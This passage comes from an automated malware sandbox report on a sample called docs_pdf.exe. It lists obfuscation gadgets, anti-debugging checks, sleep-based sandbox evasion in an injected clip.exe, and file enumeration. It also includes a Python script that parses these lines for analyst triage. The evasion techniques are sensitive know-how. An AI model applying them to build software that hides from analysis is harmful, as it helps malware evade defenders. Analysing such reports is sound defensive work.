            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Code function: 2_2_037E6246 push edi; ret 2_2_037E6247
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Code function: 2_2_037E62C7 push FFFFFFB8h; retf 2_2_037E62C9
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Code function: 2_2_037EB940 push ecx; retf 2_2_037EB941
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Code function: 2_2_037E0919 push 2823B84Bh; retf 2_2_037E0929
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Code function: 2_2_037DA1DB push esp; ret 2_2_037DA1E3
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Code function: 2_2_037EB1AE push ecx; iretd 2_2_037EB1AF
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Code function: 2_2_037E00DA push ecx; iretd 2_2_037E00DB
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe Code function: 2_2_037D077C push es; ret 2_2_037D0780
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_00FB4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FB4A35
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_010355FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_010355FD
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_00FD33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FD33C7
            Source: C:\Users\user\Desktop\docs_pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\docs_pdf.exeAPI/Special instruction interceptor: Address: F83224
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 9805
            Source: C:\Users\user\Desktop\docs_pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-98893
            Source: C:\Users\user\Desktop\docs_pdf.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 5828Thread sleep count: 167 > 30
            Source: C:\Windows\SysWOW64\clip.exe TID: 5828Thread sleep time: -334000s >= -30000s
            Source: C:\Windows\SysWOW64\clip.exe TID: 5828Thread sleep count: 9805 > 30
            Source: C:\Windows\SysWOW64\clip.exe TID: 5828Thread sleep time: -19610000s >= -30000s
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe TID: 2008Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01014696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_01014696
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101C93C FindFirstFileW,FindClose,0_2_0101C93C
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0101C9C7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0101F35D
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0101F200
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0101F65E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01013A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01013A2B
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01013D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01013D4E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0101BF27
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0279BC20 FindFirstFileW,FindNextFileW,FindClose,3_2_0279BC20
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FB4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FB4AFE
            Source: clip.exe, 00000003.00000002.2913704315.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
            Source: qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2914430659.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
            Source: firefox.exe, 00000008.00000002.2122684152.00000179057ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGG
            Source: C:\Users\user\Desktop\docs_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-97598
            Source: C:\Users\user\Desktop\docs_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-97667
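            The signature lines in this section are what a triage analyst turns into a per-process evasion profile: which process reads the PEB through fs:[30h], which one executes rdtsc, which queries its own debug port, and how long the injected clip.exe thread actually tries to sleep. The script below is an added example written for this page, not code from Joe Sandbox or from the FormBook sample. It parses the report's own line format (the Source / Code function / Thread sleep / Process queried / Binary or memory string patterns visible above) into technique counts per process and pairs each "Thread sleep count" line with the "Thread sleep time" line that follows it for the same thread. The sample input is constructed from lines copied from this section, including the trailing "Jump to behavior" link text that the HTML extraction leaves on some of them. The technique labels, and the assumption that the report's sleep figures are in one consistent unit (printed with an "s" suffix), are mine.

```python
import ntpath
import re
from collections import Counter, defaultdict

# Constructed sample: lines copied from the report section above. The trailing
# "Jump to behavior" on some lines is residue of the report's HTML link.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417356 push ebx; retf 1_2_00417359
Source: C:\Windows\SysWOW64\clip.exe TID: 5828Thread sleep count: 167 > 30Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 5828Thread sleep time: -334000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 5828Thread sleep count: 9805 > 30Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 5828Thread sleep time: -19610000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe TID: 2008Thread sleep time: -45000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E rdtsc 1_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov ecx, dword ptr fs:[00000030h]1_2_034B035C
Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FB3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,0_2_00FB3B4C
Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_010241FD BlockInput,0_2_010241FD
Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101C93C FindFirstFileW,FindClose,0_2_0101C93C
Source: clip.exe, 00000003.00000002.2913704315.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
"""

LINK_RESIDUE = "Jump to behavior"
# The report fuses the source path and the signature text; the first ".exe" ends the path.
SRC_RE = re.compile(r"^Source: (?P<src>.+?\.exe)(?P<rest>.*)$")
SLEEP_COUNT_RE = re.compile(r"^ TID: (?P<tid>\d+)Thread sleep count: (?P<n>\d+) > \d+$")
SLEEP_TIME_RE = re.compile(r"^ TID: (?P<tid>\d+)Thread sleep time: (?P<t>-?\d+)s >= -?\d+s$")
# "Code function: <pid_run_addr> <body><end_addr>"; the end address differs from the
# start address for push/ret gadgets, so it is matched by shape rather than by backreference.
CODE_RE = re.compile(r"^Code function: (?P<fn>\d_\d_[0-9A-F]{8}) (?P<body>.*?)\d_\d_[0-9A-F]{8}$")
QUERY_RE = re.compile(r"^Process queried: (?P<what>\w+)$")
MEM_RE = re.compile(r"^, \S+\.sdmpBinary or memory string: (?P<s>.+)$")


def classify(body):
    """Map one 'Code function' body to the evasion/anti-debug technique it evidences (labels are mine)."""
    if "fs:[00000030h]" in body:
        return "PEB read via fs:[30h]"        # TEB->PEB: BeingDebugged, NtGlobalFlag, heap flags
    if re.search(r"\brdtsc\b", body):
        return "rdtsc timing"                  # timing-based debugger/sandbox detection
    if "IsDebuggerPresent" in body:
        return "IsDebuggerPresent"
    if "BlockInput" in body:
        return "BlockInput"                    # hinders interactive analysis
    if "FindFirstFileW" in body:
        return "file enumeration"
    if body.startswith("push"):
        return "code obfuscation (push/ret)"   # return-address tampering instead of jmp/call
    return None


def summarize(report_text):
    """Return {'techniques': {proc: {label: count}}, 'sleeps': {(proc, tid): [records]}}."""
    techniques = defaultdict(Counter)
    sleeps = defaultdict(list)
    pending_count = {}  # (proc, tid) -> last "sleep count" seen, awaiting its "sleep time" line
    for raw in report_text.splitlines():
        line = raw.strip()
        if line.endswith(LINK_RESIDUE):
            line = line[: -len(LINK_RESIDUE)]
        m = SRC_RE.match(line)
        if not m:
            continue
        proc = ntpath.basename(m.group("src"))  # ntpath splits Windows paths on any host OS
        rest = m.group("rest")
        if (c := SLEEP_COUNT_RE.match(rest)):
            pending_count[(proc, int(c["tid"]))] = int(c["n"])
        elif (t := SLEEP_TIME_RE.match(rest)):
            key = (proc, int(t["tid"]))
            total = abs(int(t["t"]))  # negative values are the report's relative-timeout notation
            calls = pending_count.pop(key, None)
            sleeps[key].append({"calls": calls, "total": total,
                                "per_call": total / calls if calls else None})
            techniques[proc]["sleep-based delay"] += 1
        elif (f := CODE_RE.match(rest)):
            label = classify(f["body"].strip())
            if label:
                techniques[proc][label] += 1
        elif (q := QUERY_RE.match(rest)):
            if q["what"] == "DebugPort":
                techniques[proc]["ProcessDebugPort query"] += 1
        elif (s := MEM_RE.match(rest)):
            if "Hyper-V" in s["s"]:
                techniques[proc]["hypervisor string (Hyper-V)"] += 1
    return {"techniques": {p: dict(c) for p, c in techniques.items()},
            "sleeps": dict(sleeps)}


def sleep_totals(summary):
    """Cumulative requested sleep per process, in the report's units."""
    totals = Counter()
    for (proc, _tid), records in summary["sleeps"].items():
        for r in records:
            totals[proc] += r["total"]
    return dict(totals)


if __name__ == "__main__":
    result = summarize(SAMPLE_LINES)
    for proc, counts in sorted(result["techniques"].items()):
        print(proc, counts)
    for (proc, tid), records in result["sleeps"].items():
        for r in records:
            print(f"{proc} TID {tid}: {r['calls']} calls, {r['total']} total, {r['per_call']} per call")
    print("sleep totals:", sleep_totals(result))
```

            Pairing the two clip.exe records gives 2000 units per call for both the 167-call and the 9805-call bursts, i.e. a fixed-interval sleep loop rather than a single long sleep, which is the pattern to check when judging whether a sandbox's sleep skipping would have fired. The fs:[30h] lines above are one line per instruction occurrence, so the svchost.exe count measures PEB reads, not distinct functions.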
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004173E3 LdrLoadDll,1_2_004173E3
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_010241FD BlockInput,0_2_010241FD
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FB3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00FB3B4C
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FE5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00FE5CCC
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0102C304 LoadLibraryA,GetProcAddress,0_2_0102C304
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00F834F0 mov eax, dword ptr fs:[00000030h]0_2_00F834F0
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00F83490 mov eax, dword ptr fs:[00000030h]0_2_00F83490
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00F81E70 mov eax, dword ptr fs:[00000030h]0_2_00F81E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov ecx, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA352 mov eax, dword ptr fs:[00000030h]1_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D8350 mov ecx, dword ptr fs:[00000030h]1_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350634F mov eax, dword ptr fs:[00000030h]1_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D437C mov eax, dword ptr fs:[00000030h]1_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C310 mov ecx, dword ptr fs:[00000030h]1_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450310 mov ecx, dword ptr fs:[00000030h]1_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov ecx, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC3CD mov eax, dword ptr fs:[00000030h]1_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B63C0 mov eax, dword ptr fs:[00000030h]1_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov ecx, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034663FF mov eax, dword ptr fs:[00000030h]1_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov eax, dword ptr fs:[00000030h]1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov ecx, dword ptr fs:[00000030h]1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350625D mov eax, dword ptr fs:[00000030h]1_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A250 mov eax, dword ptr fs:[00000030h]1_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436259 mov eax, dword ptr fs:[00000030h]1_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342826B mov eax, dword ptr fs:[00000030h]1_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342823B mov eax, dword ptr fs:[00000030h]1_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
